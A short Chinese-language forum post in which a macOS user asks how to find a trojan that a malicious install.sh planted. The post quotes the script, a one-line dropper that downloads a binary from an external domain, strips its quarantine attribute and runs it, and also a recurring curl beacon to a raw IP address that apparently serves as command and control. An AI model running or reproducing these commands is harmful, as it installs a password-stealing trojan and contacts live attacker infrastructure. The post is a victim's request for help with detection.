最开始执行的文件是 install.sh ,内容如下
#!/bin/bash
curl -o /tmp/update https://dicoduweb.com/get15/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
通过在线网站检测出该 update 带有 MAC/Agent.FD!tr.pws 木马
监测网络后发现有一段 curl 不断运行如下指令,目前已禁用 curl 联网,通过浏览器访问下面连接请求头和响应都未能看出异常
curl -s http://45.94.47.149/api/tasks/vkBpuD+zjorGFc1q1N1a2g==
寻求大佬支支招,如何能找到这个隐藏到系统里的木马呢,使用了 Malwarebytes 扫描未查到任何异常,上面的 curl 仅一闪而过,未能看到调用 curl 的父进程